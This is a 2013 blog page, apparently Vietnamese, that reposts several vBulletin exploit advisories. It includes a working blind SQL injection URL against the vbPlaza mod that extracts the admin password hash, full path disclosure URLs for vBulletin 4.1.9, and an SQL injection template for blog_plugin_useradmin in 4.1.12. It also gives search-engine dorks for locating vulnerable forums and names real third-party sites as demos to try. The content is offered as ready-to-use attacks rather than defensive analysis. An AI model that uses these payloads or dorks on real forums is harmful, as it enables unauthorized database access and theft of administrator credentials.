Tuesday, 21 May 2013

SQL vbulletin 5.x và code perl

#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/

How to manually inject :
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
-------------------------------------------------------------------


--------------------------------------------------------------------

Read more »
Posted by at No comments:

Wednesday, 15 May 2013

Vbulletin MOD all


c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection 


--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--
AUTHOR: Cold z3ro &amp; Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
EXPLOIT:
http://www.site.com/forum/vbplaza.php?do=item&amp;name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
IE: ascii encodes
  58  => :
  48  => 0
  120 => x
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .
Copyrights : www.hackteach.org , www.h-t.cc
Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends


Read more »
Posted by at No comments:

exploit vbulletin 4.1.9

# Full Path Disclosure:

http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
http://localhost/path/calendar.php?do[]=linc0ln.dll
http://localhost/path/search.php?do[]=linc0ln.dll
Posted by at No comments:

vbulletin 4.1.12

vBulletin 4.1.12 SQL Injection


################################################################################??########
#
# Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir/forum
#
# Software Link : http://www.Vbulletin.com/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : intext:"Powered By Vbulletin 4.1.12"
#
################################################################################??########
#
#  Expl0iTs :
#
http://target.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql]
#
################################################################################??########
#
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
#
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
#
# Mr.Xpr &amp; M.R.S.CO &amp; Mr.Cicili &amp; H-SK33PY &amp; All Members In Www.IrIsT.Ir/forum
#
################################################################################??########

Read more »
Posted by at 3 comments:
Subscribe to: Posts (Atom)